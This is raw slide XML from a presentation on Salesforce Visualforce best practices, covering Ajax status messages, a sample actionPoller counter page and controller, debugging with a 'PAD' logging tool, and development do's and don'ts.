              <a:t>It can slow the navigation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1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Maintenance is more complex / costly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1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The user can get lost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fr-FR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill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1600"/>
              <a:t>Aim for the right balance between aesthetic and and minimalistic design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fr-FR" sz="1600"/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1600"/>
              <a:t>Avoid unecessary Ajax and javascript interaction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endParaRPr lang="fr-FR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&lt;VisualForce - Keep your user updated&gt;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fr-FR" sz="1800" smtClean="0"/>
              <a:t>Ajax request can take long, make sure to tell the user what is going on with the following tag : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" smtClean="0"/>
              <a:t>&lt;apex:actionStatus&gt;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fr-FR" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" smtClean="0"/>
              <a:t>An error can still occure, warn the user with putting one of the following tags on the top of your page :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" smtClean="0"/>
              <a:t>&lt;apex:pageMessages /&gt; (recommended to get a salesforce styling)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" smtClean="0"/>
              <a:t>&lt;apex:messages /&gt;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489200" y="2344738"/>
            <a:ext cx="4518025" cy="21224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defTabSz="250825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defTabSz="250825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defTabSz="250825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defTabSz="250825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defTabSz="250825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defTabSz="250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defTabSz="250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defTabSz="250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defTabSz="250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 sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Page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 b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--&gt;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 b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;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page controller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"exampleCon"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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 b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;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form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;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outputText value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"Counter: {!count}"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> id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"counter"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;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actionStatus startText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"(incrementing...)"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> stopText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"(done)"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> id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"counterStatus"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;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actionPoller action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"{!incrementCounter}"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> rerender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"counter"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> status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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"counterStatus"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/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form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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 b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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8080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/*** Controller: ***/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8000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>public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>
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> exampleCon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{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Integer count </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=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>
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> PageReference incrementCounter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()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 b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{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count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>++;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>return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 b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Integer getCount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;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</a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}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r>
              <a:rPr lang="fr-FR" sz="700" b="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="700">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="fr-FR" sz="7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PAD&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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509588" y="1003300"/>
            <a:ext cx="8177212" cy="4759325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>When you access a method (action, constructor, getter, setter,…)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" smtClean="0"/>
              <a:t>Add a PAD.Log at the beginning of it :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="800" smtClean="0"/>
              <a:t>PAD.Log(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" smtClean="0"/>
              <a:t>‘Starts',‘yourMethodName');</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="200" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" smtClean="0"/>
              <a:t>Add a rerender=“PAD” in the tag that called the controller method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" smtClean="0"/>
              <a:t>When your method takes an argument / returns an output :</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" smtClean="0"/>
              <a:t>PAD.Log those information :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="800" smtClean="0"/>
              <a:t>PAD.Log(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" smtClean="0"/>
              <a:t>‘Parameter : ‘+yourStringParameter);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="800" smtClean="0"/>
              <a:t>PAD.Log(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" smtClean="0"/>
              <a:t>‘Returns : ‘+yourStringOutput);</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="200" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" smtClean="0"/>
              <a:t>Eventually you will have to convert your parameter or output to String / Integer</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="100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AU" sz="1400" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" u="sng" smtClean="0"/>
              <a:t>This will allow you to have a clear understanding of what is happening on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" smtClean="0"/>
              <a:t>When the user is not supposed to interact with the page, prevent him from doing so with PAD_Lock() and PAD_Unlock</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" smtClean="0"/>
              <a:t>When your method can highly consume governor limits (non limited SOQL, Bulk DML operations,…)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" smtClean="0"/>
              <a:t>Add a PAD.Limit at the end of the operation :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="800" smtClean="0"/>
              <a:t>PAD.Limits(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="80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1400" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" u="sng" smtClean="0"/>
              <a:t>This will give you an overview of how close to the limits is your code</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="900" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" smtClean="0"/>
              <a:t>To track performance issues :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" smtClean="0"/>
              <a:t>Add a PAD timer :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="800" smtClean="0"/>
              <a:t>PAD.startTimer();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="800" smtClean="0"/>
              <a:t>PAD.stopTimer();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1400" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" u="sng" smtClean="0"/>
              <a:t>This will give you an overview of the timing of each complex method so that you can focus your attention on a particular part for optimization</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1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Do’s 1/2&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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509588" y="1003300"/>
            <a:ext cx="7262812" cy="5626100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Put an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>ID on your Tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0" smtClean="0"/>
              <a:t>, it allows to :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0" smtClean="0"/>
              <a:t>facilitate the documentation that will only refer to the id rather than the tags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0" smtClean="0"/>
              <a:t>refresh what you want without having to add IDs later</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0" smtClean="0"/>
              <a:t>use the same references when discussing / reviewing the code</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Use Templates or Custom controllers VS copying/pasting code to make updates easier and quicker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>URLFor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>() instead of hardcoded URLs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>In order to increase performance :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> decrease the amount of memory used for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>view state </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>by using the apex “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>transcient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>” keyword as possible as you can.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Use the &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>apex:actionRegion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&gt; tag to demarcates which components should be processed by the Force.com server when an AJAX request is generated</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>If you need to access a field label in the current user language, use the global variable $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>ObjectType</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Example : {!$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>ObjectType.account.fields.name.label</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Limit what should not be unlimited : rows returned by SOQL/SOSL, number of elements added to  a map / set / list, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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Do’s 2/2&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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509588" y="836613"/>
            <a:ext cx="8177212" cy="1892300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>When not rendering in pdf, prefer the use of tags that match standard salesforce style as you will get UI enhancements with new releases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t>pageBlock, pageBlockSection, pageBlockButtons, pageMessages, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="1000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Comment and structure your code as much as possible</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="160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14600" y="2641600"/>
            <a:ext cx="3962400" cy="373524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/*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BuisnessProcessName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Developed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by...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Version...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*/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class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myController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{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 C.O.N.S.T.R.U.C.T.O.R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myController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(){…}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//The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constructor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doing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and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that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 A.T.T.R.I.B.U.T.E.S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Public String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myObject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{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fr-FR" sz="700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;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;}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//This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attribute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used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for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and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that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...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 G.E.T.T.E.R.S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getTrue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(){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We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return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to the user if...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 dirty="0" err="1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;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...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 M.E.T.H.O.D.S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8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void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doIt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(){…}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//This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method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doing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this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 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>that</a:t>
            </a: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...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pP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    ...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 T.E.S.T   M.E.T.H.O.D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8000"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>// ============================================================================</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pP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dirty="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8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>static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itchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>testMethod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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> test</a:t>
            </a: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(){...}</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="7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fr-FR" sz="700" b="1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Don’ts&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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8" y="1162050"/>
            <a:ext cx="8177212" cy="52387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AU" sz="1400" smtClean="0"/>
              <a:t>Never duplicate IDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="9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Do not rely on the order of events firing as this is not guaranteed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="9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Never hardcode text but always use the Custom Labels as soon as it is not translated by defaults via the workbench (fields)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="9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Never hardcode IDs (example : record type Id, or profileId)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" smtClean="0"/>
          </a:p>
          <a:p>
